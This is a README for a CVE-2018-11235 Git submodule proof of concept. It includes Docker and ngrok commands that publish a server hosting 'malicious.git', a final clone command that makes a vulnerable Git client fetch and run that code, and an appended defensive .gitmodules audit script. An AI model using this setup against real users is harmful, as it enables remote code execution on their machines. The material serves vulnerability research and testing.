twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration

CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration

CVE-2018-11235-Git PoC and tunneling with docker ngrok

Build Dockerfile

$ docker build -t cve-2018-11235 .

Create custom network for ngrok

$ docker network create myngroknet

Start Git HTTP Server

$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235

Start Ngrok HTTP Server for Git Server

$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN

You can now access the API to find the assigned domain:

$ curl $(docker port ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}

PoC on Vulnerable Git Server

$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git
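
To check a repository before cloning it with --recurse-submodules, the following added example (not part of this repository's code) audits the text of a .gitmodules file using the name rule that patched Git versions enforce for CVE-2018-11235: a submodule name must not be empty or contain `..` as a path component. The function names and the sample .gitmodules content are constructed for illustration.

```python
import re

# Section header as written in .gitmodules, e.g. [submodule "libs/foo"]
_HEADER = re.compile(r'^\s*\[submodule\s+"((?:[^"\\]|\\.)*)"\s*\]', re.IGNORECASE)


def submodule_names(gitmodules_text):
    """Return the submodule names declared in .gitmodules text."""
    names = []
    for line in gitmodules_text.splitlines():
        match = _HEADER.match(line)
        if match:
            # Undo git-config escaping (\" and \\) inside the quoted name.
            names.append(re.sub(r"\\(.)", r"\1", match.group(1)))
    return names


def is_unsafe_name(name):
    """True if the name is empty or has '..' as a path component.

    Both '/' and '\\' count as separators so the result is the same on
    every platform.
    """
    if not name:
        return True
    return ".." in re.split(r"[/\\]", name)


def audit(gitmodules_text):
    """Return the declared submodule names that fail the name rule."""
    return [n for n in submodule_names(gitmodules_text) if is_unsafe_name(n)]


# Constructed sample input, not taken from any real repository.
SAMPLE = r'''
[submodule "docs/theme"]
	path = docs/theme
	url = https://example.com/theme.git
[submodule "../../modules/other"]
	path = other
	url = https://example.com/other.git
[submodule "lib\\..\\hooks"]
	path = lib
	url = https://example.com/lib.git
[submodule "release..v2"]
	path = release
	url = https://example.com/release.git
'''

if __name__ == "__main__":
    for bad in audit(SAMPLE):
        print("unsafe submodule name:", repr(bad))
```

Run it against the .gitmodules blob fetched without recursion (for example from a plain `git clone` followed by reading the file) and only initialise submodules when `audit` returns an empty list.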
